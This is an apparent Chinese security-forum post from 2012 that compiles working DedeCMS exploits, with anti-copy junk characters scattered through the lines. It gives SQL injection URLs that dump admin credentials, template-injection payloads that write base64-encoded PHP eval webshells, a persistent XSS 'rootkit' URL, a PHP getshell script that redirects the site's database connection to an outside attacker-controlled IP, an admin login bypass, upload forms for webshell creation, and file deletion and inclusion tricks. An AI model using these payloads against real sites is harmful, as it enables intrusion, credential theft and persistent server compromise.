找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3081|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" H- t6 k4 N, I6 {Dedecms 5.6 rss注入漏洞
4 R" w  C; f9 Q; o$ p5 i; t3 o
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
9 }. y- k" t4 q8 l+ R: o) Q' J% J# m& m7 e, @5 C
4 k+ ~/ L& W+ J9 k0 f$ l: l5 ]+ A
5 k( e' _( q" Z( c% @, j
' J5 w5 I9 j& F, d% ^0 o
( s9 a# g+ }6 {9 R) H! f

  J8 |+ X, j; I' Q2 ~# A+ \: E9 u' l) C9 f" I& h# ]9 c

- K1 j. M* g9 y2 O- C1 _2 zDedeCms v5.6 嵌入恶意代码执行漏洞2 ?3 ]3 h% S" e# ?! l
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}$ b; c3 X  x+ @7 z
发表后查看或修改即可执行
) C- D$ ]( D: z' ra{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}3 E( y, L) T# k6 R% m7 f- W
生成x.php 密码xiao,直接生成一句话。% ]7 W$ [. ]- O( o

- A1 O8 v; F+ i* r
4 T; s7 p! ?5 v+ e% N* p* o4 ?# `& N# J

% ]& z0 S+ B* C+ z
! B" u4 k; f" H! g/ k. O
* q9 g1 }9 l! s8 L& Y% ^' I( K# S  \: y
2 B7 a3 j0 l& {. J( E
Dede 5.6 GBK SQL注入漏洞+ V7 S) o! }, @! H
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
% I* t: e/ }8 h7 Z) H" u
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe/ w( J0 U+ u7 m9 M2 k8 m
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
/ _( b( h. k" t$ T, {
# g3 L/ n  _- W+ B; v1 N6 g2 F& @3 U9 _* L; ?+ U) g3 g) X  [7 e
! U6 I' P" e" K- i! `
8 p$ H8 O9 A7 Z2 `3 i+ P5 h+ z

4 T: p# b: b7 C$ G6 b3 y& X4 v- Q$ L5 ]: z8 c6 c4 ~0 E% q
* R9 h! E- P3 @4 ~# B+ V

6 `6 ~5 `* v9 Q; C  H6 r" yDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞; x& b" s  Q) ]) u0 [
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
2 \" ]( E; U0 t8 c$ _" L$ q: h: r* O4 k; Q3 a* l& Z
/ \: O, U; Q8 h6 o: ], d2 _
. N; l1 T* t" C+ A" f0 i/ V
# v1 K3 \; w, |# q0 f- m
( f. G; s8 n8 K' D0 M! l0 Z7 p

/ S3 a0 j) u) K# I( FDEDECMS 全版本 gotopage变量XSS漏洞
; a- v& U( ]) P, ]0 y; m7 @4 s1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 $ r) l5 v* l: T: |% b6 z- n& ?
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
* @+ w3 W0 w8 G8 I+ b  b+ t. Q7 S2 r& I7 Z: T6 v' O  X

* p0 q& V- ~" I7 ^  ^3 x8 d% s% R2 @2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
0 ^& R- A! U0 e7 g1 l, e( N
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda/ _/ |& L. U+ d. F5 w/ `2 i6 A; @
' y$ I, S2 y# y% e) E' V5 t
- R! r% I1 K5 Y5 o$ a4 H, _
http://v57.demo.dedecms.com/dede/login.php  E$ n% y9 s  K$ _1 _: j
8 Y' h+ e) L6 ]' V+ @* [
! S" i8 ~2 ?" I( \( t( t
color=Red]DeDeCMS(织梦)变量覆盖getshell7 k$ v* i' G& B5 k% B, i
#!usr/bin/php -w
! ^* ^0 O- N8 F: Y6 F  v6 f1 F3 a<?php0 ]7 R+ t' N: ?: M* V0 p* H8 ^
error_reporting(E_ERROR);# T# ?$ z7 h4 n9 w
set_time_limit(0);: @( f& z2 `7 K5 ]8 g
print_r('
0 z# c0 M( p. [' d4 @9 i' \# NDEDEcms Variable Coverage
5 g5 t* o: L0 g3 K! I: W5 WExploit Author:
www.heixiaozi.comwww.webvul.com8 N% ?1 A: S: \, F# R
);
  d, q% I0 e8 Z6 {echo "\r\n";! A! |5 R# T0 G* z1 i8 n$ {
if($argv[2]==null){7 W6 q# x) d. S
print_r(': Y9 v+ S1 Y/ C+ c
+---------------------------------------------------------------------------+* U: R3 s, h  L' n3 p* U8 ^
Usage: php '.$argv[0].' url aid path
6 Q  N; ]7 g( C$ \, eaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
7 E$ n/ W( h2 y5 T/ @5 EExample:
! F: h) N) `  Jphp '.$argv[0].'
www.site.com 1 old" s2 g- U- K0 \2 O9 T- J3 O
+---------------------------------------------------------------------------+
" J$ p5 b  H# V');
& X$ {" q$ U3 F8 zexit;# m/ h( ~2 G- O0 o$ \# f9 Y4 B( u
}
  _2 Y: l& A' c: ^$url=$argv[1];7 ^' T2 O% }6 L9 o4 v. Q! C
$aid=$argv[2];
. T) O. O3 M' e& S$path=$argv[3];$ c' r) z* c3 X
$exp=Getshell($url,$aid,$path);
9 ^" A" R; k4 E1 c9 Pif (strpos($exp,"OK")>12){
8 Q& K0 g4 V1 ?echo "* x4 c* T$ {$ J7 @
Exploit Success \n";5 h4 a3 N; |& x+ @& s& y6 U, `  U
if($aid==1)echo "7 k- m! r& ?* J3 c0 [! i( b8 T8 t/ J8 U
Shell:".$url."/$path/data/cache/fuck.php\n" ;# n' k" s$ y9 Q
1 a% @! t! I9 {2 ~) h; ]6 Z

4 H5 P( H) \! W& d' Q0 _if($aid==2)echo "
* {6 h5 \" g6 e  h7 xShell:".$url."/$path/fuck.php\n" ;
, p# A" C  S( e: u: _, T# o+ w6 n5 E" e, @( ?! C( X0 a

9 m3 q# z1 U' G% Lif($aid==3)echo ". B, F; U& h& y1 m8 X9 o, `0 G( W+ a
Shell:".$url."/$path/plus/fuck.php\n";
, t- Q3 a7 G0 e( T) Z) o
8 S8 j  n+ X; g- _% o
3 {/ v; _* w5 F: g}else{- {8 t5 S# |. b7 e: ]; |- E
echo "- V/ v* S- H( {. D( k
Exploit Failed \n";  H& U) J( T5 P1 {6 V! O
}( Z1 Z% O: ^- Y+ M. O$ h
function Getshell($url,$aid,$path){" j* W  \0 \9 Q; h# j  r/ z. O
$id=$aid;
' j' x- q/ \. [$host=$url;
* E  G# k2 C1 Q$port="80";; Q# v, L" D3 y" l0 \- G
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";# Z$ J+ u1 D& Z. d1 N: [" H
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";2 ~. D# O+ O  ~: H( T: U
$data .= "Host: ".$host."\r\n";" ~8 }/ _: W3 p$ ?! ^3 }
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
( a7 a2 Z" t. l7 G  ]) ^2 j$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
% H* O9 F) o/ ?0 r$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";. l7 j$ u5 S6 U* r' ^8 {% a9 F. q
//$data .= "Accept-Encoding: gzip,deflate\r\n";1 D  e2 F  ^) v  r9 h
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";* @8 i" v& e  [7 m- W: N
$data .= "Connection: keep-alive\r\n";2 |; h" X4 [" u: _5 g* z
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";8 v! f# e  @' b
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
) F7 Z1 i5 d( Y5 m$data .= $content."\r\n";
% U2 v) E, r, Z+ Y# d4 H$ock=fsockopen($host,$port);
  B. g" t' U" l4 x' ~: f' Q3 Aif (!$ock) {% d# O$ \( x7 d0 k# i2 ]% }" t
echo "
) {* c5 L: v+ cNo response from ".$host."\n";- ^1 n9 d8 C5 o* a5 f$ ^( B9 x  W$ R
}% [6 Y5 A4 A) x# U  w
fwrite($ock,$data);- c8 H! G+ u: X% {
while (!feof($ock)) {4 k0 T3 h0 @* e1 [7 y6 L0 }
$exp=fgets($ock, 1024);
9 Z8 {4 i, r% d0 _# _return $exp;
5 z" U7 a) K1 M}0 ^4 R9 T  s) w0 M
}
* d5 V; y! \3 j: g" a- n7 Y/ T5 b& Q  w  a! N5 W
- }8 ~- [% l5 U" R: W
?>
' [/ G2 P  |+ s: W  H8 B8 j2 N3 j* R' i9 z5 a

$ S/ [/ D6 M% ^8 m7 _0 a
! U  i2 D2 D$ E, N. \6 I$ ^
5 \6 W3 M8 d+ Y5 a! V0 ~1 s9 x8 P8 Z- K
% Y3 n+ y& |) l- i
: x1 o# c% Y, j  A) r1 ~
4 H$ I8 `" ]6 F$ m2 O* \5 A+ ]
; m. R% M, L! `) i0 n. f+ `7 Z
4 z/ O" S1 p* n3 ]
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)# h* S$ H6 r1 x+ K' E) ?
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: d) B1 U1 Q: }$ p4 e: H- R
& r) b8 m; Q# z2 K# p
) W  {* q0 [8 E1 c5 ?: [把上面validate=dcug改为当前的验证码,即可直接进入网站后台
: i( Y4 _, [: j1 ^, k5 [' P6 x4 K" p

, f8 X$ [; H* |9 n: z4 F( S此漏洞的前提是必须得到后台路径才能实现
0 i* [, E. _& D5 i/ o
1 M3 h. q- A9 g* [/ ^5 _% R& q
6 h" g' g+ R+ d4 K9 H" h( d6 U. Y% G; l! s1 |
5 Y! K  q+ h0 C, j. w7 k8 i: s% R+ W

+ v0 w. G1 V, Z! ~  |* W% y, g9 E& ^; W% x! Z( S8 h+ C) J

: H% J0 A8 N/ e; P# W# G, U' T
  V, M; X2 D( V( k! Q
/ u8 ~% ], M: u7 k3 R& t
7 J" m/ w1 P3 \) L& p( N( I) `( UDedecms织梦 标签远程文件写入漏洞
$ |$ o$ J8 [$ x: C' c; F前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');/ _' S! T$ x# @* X7 \' L5 i

6 K- o. c8 T, ~- b, U7 [1 o" g5 a7 q4 ~7 F
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
$ V+ Y  d0 v. c<form action="" method="post" name="QuickSearch" id="QuickSearch">2 k4 S' `6 O; g- d" m
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
* I$ R& R! [- E# l6 h6 h% E  m<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
. ^& M0 M! y% `- j; a<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />$ g. R5 }6 |5 N; @1 W+ c
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
8 {  P: t, U8 x( M8 [- j, x+ I<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
+ o- O, g2 O4 X& G$ R( O<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
0 J) `$ G) M; K9 m% x5 N! a0 g<input type="text" value="true" name="nocache" style="width:400">7 P$ Z# k& h8 ?' O1 _# a: C
<input type="submit" value="提交" name="QuickSearchBtn"><br />
' f$ _5 a$ L4 I</form>
+ S3 a7 x5 V4 ?5 L9 V0 L& y<script>
; |2 o5 b* T# ffunction addaction()
/ T5 u7 B) w0 V* C# N# A. Q. K6 R{; O) {/ E8 z( J& H' y) S" ?( z
document.QuickSearch.action=document.QuickSearch.doaction.value;4 l  [2 ]' V- o# Q" Z4 T
}& d$ L* i  R  g: M) q0 ]
</script>- A' C9 ~% D, c! i
  F3 z* `8 k8 X5 h
5 E% g' K# Y7 {, C1 r# m# B

8 I7 {6 S0 H- S- r$ [% H: V3 l2 b, A# a/ o: m! R

4 f+ x* \$ m# ~: [5 z' E8 x5 S2 w! F1 L" H$ d2 g5 ]; Z) j

0 A) p8 P& B. m) @; v2 f+ d9 `9 E4 g

7 K5 Z: E+ `& V
* l( B; {0 o5 t; P; K/ ^" k) GDedeCms v5.6 嵌入恶意代码执行漏洞; ^2 r  `9 S% D" D. Z9 H7 p) D
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
% L& m. Q3 I% w% z7 z6 R" b0 Qa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}! \5 b3 f' u% v! j. [0 n
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得/ h+ S& K9 }/ i9 i, C8 t8 l1 q
Dedecms <= V5.6 Final模板执行漏洞6 a+ D& c( a8 l, P
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:1 z6 `2 q1 J- O) |$ b
uploads/userup/2/12OMX04-15A.jpg
2 E5 X# N2 ~5 n+ r8 R' a$ l) j- V  O
# i& X* l) S, P+ v" f
模板内容是(如果限制图片格式,加gif89a):
2 u# d6 k- o7 ]2 I. g$ b$ E/ u% C; L{dede:name runphp='yes'}5 ^/ W+ h/ }7 g: D/ F) w! a# J
$fp = @fopen("1.php", 'a');/ H- Z- `! D8 m2 K
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
9 F4 n* x- i, {0 w5 Y+ `" H@fclose($fp);- O% T: I* m1 A2 N
{/dede:name}$ `% d6 t3 }9 u: g( s) S& T
2 修改刚刚发表的文章,查看源文件,构造一个表单:
- J, g7 a8 ~4 U# `4 N<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">7 ~+ ]3 Q) P/ }% Q2 m. @1 u4 Y
<input type="hidden" name="dopost" value="save" />5 ^4 R9 ]$ p2 V) @
<input type="hidden" name="aid" value="2" />$ T' |/ ~. t* H8 k; L3 i0 I( h
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
3 P2 a$ Y* ^. \' r, B: X<input type="hidden" name="channelid" value="1" />
  x2 {0 ?: n0 C6 r<input type="hidden" name="oldlitpic" value="" />
3 Q* U, Y5 K9 P5 r<input type="hidden" name="sortrank" value="1275972263" />
9 {1 ]# T- o( o" Y  i0 o+ C( d% V2 _+ V" ]7 i5 r: `

( k$ h. `: E+ M6 X1 p<div id="mainCp">
7 i0 Z+ |( g+ L& c. G- o/ ^: s<h3 class="meTitle"><strong>修改文章</strong></h3>' l3 ?. v+ d) S" O5 m: n+ j
$ P/ f" B# U# i5 e7 v$ l3 ?  Q/ ]: h

) V8 W, v; _( n9 V3 N' ~8 `<div class="postForm">
! H  o+ }! @2 [7 H% G<label>标题:</label>
2 x5 ^: R) b1 D. W/ F1 B<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
$ I% ?9 `. B7 S, {* D( T7 X+ {: K6 @7 Z7 F

' c" }9 f1 v/ A<label>标签TAG:</label>8 {% B7 e- ]( }8 n2 u* Y
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
" n' U4 J, P& B5 G1 W) {
; V3 C* W8 M% R
8 f2 J2 a+ `7 i8 I1 \6 |- V<label>作者:</label>
  L  a3 e6 ~$ X3 E' V7 j; ^* Z7 c<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>2 t5 g& x% @% {! w0 M) E
  P! s! G" w. M5 Q

& h/ m! i2 v, ^1 Q1 O9 s9 V; J" m<label>隶属栏目:</label>
" _3 ~1 O4 c! c7 U( t<select name='typeid' size='1'>
5 @7 g; c" S4 ?- Q; o! p<option value='1' class='option3' selected=''>测试栏目</option>6 E" C! r* i; z, ?" d+ h) ^8 \
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
; I' x+ Q; l6 A1 Z+ [: {
( V8 J( u+ \8 F/ M; l
; y9 ]0 {4 u3 X, Z! G' l  \/ m<label>我的分类:</label>- i, ^3 r$ r; w  ^7 n
<select name='mtypesid' size='1'>: B: E8 O$ S* g9 y6 g% C
<option value='0' selected>请选择分类...</option>
8 v1 b- ^2 G( v0 L' ?+ ~1 V<option value='1' class='option3' selected>hahahha</option>3 A# g; {8 v3 z1 g( U( t
</select>
- q; d' _+ A$ o8 v9 M% ~4 A/ l; C9 h+ {* d( G

) r& G2 P2 E) l' J0 u2 a<label>信息摘要:</label>& s, k- S. K) W, `/ R
<textarea name="description" id="description">1111111</textarea>
/ ^1 H/ t& W/ X4 o3 `  K9 `(内容的简要说明)/ ]' c8 b2 J8 ?6 K
  P& R- I" P5 l; P
: r; O# Y- x% g$ R- k8 D; h
<label>缩略图:</label>. D+ {8 r; j- M; V# \
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
$ [: X0 Q: A7 I
0 _2 ?& J/ x/ A. V' m- U! M+ p4 d. v
<input type='text' name='templet'2 E. e8 _5 c3 ]( L6 H
value="../ uploads/userup/2/12OMX04-15A.jpg">
6 v& ~: Y: y/ K0 I" Q; X4 q<input type='text' name='dede_addonfields'
5 F  [* C" k9 n& M/ ~4 }% H) Ivalue="templet,htmltext;">(这里构造)
/ _' ]( E/ |9 [/ V3 c& q4 _( u& d9 L- U</div>: _) r; \( @7 k' w/ G2 r1 v3 n& m* b
/ v* p4 R0 S: [& n' f6 u; ~
% F. I' G- ]5 {# a- V5 G1 h2 `
<!-- 表单操作区域 -->3 j: Y3 p) E- k2 I3 d0 }' j
<h3 class="meTitle">详细内容</h3>4 _+ G9 Q( ~( i3 F" _1 q
& E4 I6 C) m% r2 R6 C3 B
* q1 W% R$ K! b  U* `' G
<div class="contentShow postForm">
6 d+ Z. A9 {8 v/ e2 |8 D<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
+ K% L: e0 f( G& A+ s$ t& ^/ W& a/ X

/ u9 ]* Z& ~; R3 E0 g7 q! `<label>验证码:</label>
) K3 D. ?% A. I. ~8 o( L3 [6 h) y( X0 @! a<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />% X$ e( q3 W9 U1 H8 v
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />  J6 [" g' p% V
2 x6 A( I# e7 i$ D3 N5 E0 o
1 W" J2 a  ]( H# c) U
<button class="button2" type="submit">提交</button>
' Z  `4 _9 q  S<button class="button2 ml10" type="reset">重置</button>; l1 E; I( b3 ^- r) \( j
</div>% Y# ^4 A1 M4 w* p" t* X+ }

; {6 W5 s1 I3 r, `$ {
6 O7 q& Y3 s4 i1 c3 ?" F</div>/ f# V8 P3 _6 a3 \/ O

* Q3 X; a% ^- l% F0 h' Q% |6 J
) A3 |9 D0 h/ C4 g4 Y% t</form>
9 a4 c5 p! E. K  G  D8 N1 F+ o
/ g* t+ ^3 x6 g. G) V) w# M  `- X8 g& `5 a& K
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
* ?' Y4 p0 O) S9 B" e$ Y( c假设刚刚修改的文章的aid为2,则我们只需要访问:2 V+ G4 X: w" ?- f
http://127.0.0.1/dede/plus/view.php?aid=2; Z: L* \7 K$ N, D; W- Z, o
即可以在plus目录下生成webshell:1.php6 Z1 T6 P9 V; f9 p, X3 i
! g9 ?( E7 n) G6 N# o2 }" }

$ ?- `6 b" r, {) k1 X$ d
4 B$ O1 ^1 t( O# O2 K: U! V4 c0 G+ H  B) T5 A, @3 \1 j6 C, d

: [) v* f) [5 q7 u/ W8 b( L# W& {
$ X3 g6 a! p0 O
9 R. e  w, Y- m' W; s
8 T; v' R$ x) K% p# i- H' y0 i' \. a
. N! ?2 ?$ p8 \& n' m- k1 H( l0 s8 ?  r. o6 t. O4 T+ V6 X6 w
" |, s, ]8 v; F. ?/ i3 C
, y* s0 I: W8 [0 _
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
" `; ]  }7 `4 m3 q  A) ?. jGif89a{dede:field name='toby57' runphp='yes'}; w; F6 k/ P& y* X
phpinfo();
, o7 F  V! `1 j/ j. Q- [9 M3 |1 j{/dede:field}8 l; G, a  ?% N6 J/ r
保存为1.gif
' y# [# x2 [9 z6 |) v" F<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> " p$ U' z+ V7 T( _  ]/ C( _! u$ c
<input type="hidden" name="aid" value="7" />
6 w; ~' n' L. f: z! W& H* v<input type="hidden" name="mediatype" value="1" />
- j6 F3 m( j( B2 M4 o  w' E$ g<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ) r1 V; W% ]; Y( ]* Q* F) p
<input type="hidden" name="dopost" value="save" />
5 M4 v5 `9 R; N( X1 F<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> / J) M$ q8 E3 x% G( W# Q: m( o
<input name="addonfile" type="file" id="addonfile"/>
+ Y! g4 S7 X7 _0 a<button class="button2" type="submit" >更改</button> % B2 Q" ^4 @2 T. K& K) W
</form>
2 i4 [: l3 l* e2 R) Y4 V4 k1 r6 Z: [% }9 A# M" o9 z" w; f

1 i. n0 k, J6 D: s: ~" c, z" _构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
$ F" M- S5 {* I发表文章,然后构造修改表单如下:4 D7 B" i1 l8 Y$ k+ {
* H. Z; E! {: c4 v2 b5 g: G3 u/ c
, A  n& d# T$ U$ r+ o- ]3 U
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 9 r* f8 O" P$ d) l: N
<input type="hidden" name="dopost" value="save" />
; |1 ]. {! f' w0 B+ D<input type="hidden" name="aid" value="2" /> / L6 {' e8 O+ z. Y8 X* H
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ; N- V' W, H9 D
<input type="hidden" name="channelid" value="1" />
$ q8 \9 Z' E6 E<input type="hidden" name="oldlitpic" value="" />
3 {- c: H& C3 j, {& W<input type="hidden" name="sortrank" value="1282049150" />
. {* c5 r2 e/ u( f9 q$ n* Z5 b<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
- p/ B8 O/ M* Z+ O4 J<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 6 O5 H" V# y, ~$ w
<select name='typeid' size='1'>
# K- }" A5 b* l2 u+ E1 e; w<option value='1' class='option3' selected=''>Test</option>
  d* ?' L7 S. y: u& }* q& \6 z<select name='mtypesid' size='1'>
4 h$ d& i+ m0 f" ?8 }+ i( B<option value='0' selected>请选择分类...</option> & L5 @# @0 m& w1 c* _
<option value='1' class='option3' selected>aa</option></select>
: ^# {& W; i  w2 L4 Z<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
% p5 f- H+ G, j3 B0 t  Z# f- p* `0 A<input type='hidden' name='dede_addonfields' value="templet">
- I3 I% m" M1 Z6 @) [4 C<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> : j4 k- a# ?' o6 ]1 D$ u
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> / l0 H3 m* u, p- {6 f
<button class="button2" type="submit">提交</button> ! A! M% `0 Q% A; @6 P/ Q
</form>9 z) x8 y& Z9 H! j+ T9 ?

; a# S6 z! N) l! X' X. {/ C* ~6 H% u( [* @) e, j- c! A2 d. G0 U! B/ u

. O  }$ t" U. {" z1 |
# u1 r3 u1 l2 s
! X  z1 A. L7 t% w  Y' |
$ p! t- a: c" {1 V4 a  F7 P9 H1 z3 G3 V- I# X1 l! X

6 }( o9 h. ?) p" m! p
$ J5 k3 J" ~' {" X" y8 t! g8 k
, S! }8 b( g5 H  b, w- [: E: h! y
% N6 X" I0 ]2 c. @$ q  w
1 a  [& f7 Q( _& l1 J7 h7 [9 N& p! @织梦(Dedecms)V5.6 远程文件删除漏洞
' F' _9 m( d4 z6 e  G0 n2 X, g
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
, n' V0 T, R. s  X4 Q! C9 p; g# \' U% [( s9 ^- a7 ^* j" [: f5 O
9 N8 [- j3 n+ @& x8 I

( A- _; h, L% U8 `. T: ~, F7 Y" r/ s- z$ x

- N1 H6 K( J1 F: u' K, F+ I  {5 N0 N) W) F) t9 S2 ^

7 }8 q0 z7 n2 c4 M
$ x1 ~) p- N* ^( d. S, y' M  E: `/ W7 n& ]
" F  R4 d% W: M3 s+ _* _
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 4 H" X+ e" w9 w( _2 q
http://www.test.com/plus/carbuya ... urn&code=../../* Y/ i0 G8 b0 f, ^( S

& e* F! e6 A' o; j/ g1 q
5 t& z7 @6 C9 O$ _" r# U2 I3 }  c- J" F. D2 R' _: C

. J) b9 ]. z+ B! s" x- ?; S1 m1 U; r/ |" v* |: W5 N

* r/ a% S7 Q# T- L5 ]2 `% b& u3 w2 m$ @  {3 f( ~- u

7 q. v6 c+ u( {7 Z  n' p, A# X8 C$ ]7 @. {3 B: ~9 n: A+ T

5 `3 l' ~; c9 c4 J8 S& ]DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ( _: x2 y, g/ |% b3 f, o
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
% H$ {' C9 r- f. W' J. r& y密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
& g: O" Q3 c, O2 v" w" S1 C, h* k/ X. |8 P1 l! e
+ Q0 h8 N7 O" k7 t5 \
, M+ I8 [" ]1 x+ Z
, M2 {4 ?' _+ T, R
1 P- a4 z$ I$ C/ T! D. ^# w) ]
- i% e& A( L4 u" k0 q

( ~' f7 f" h1 d- o% n& B, T2 S, |
2 p+ D  _9 }' K% X9 q" N- n; D0 s" B

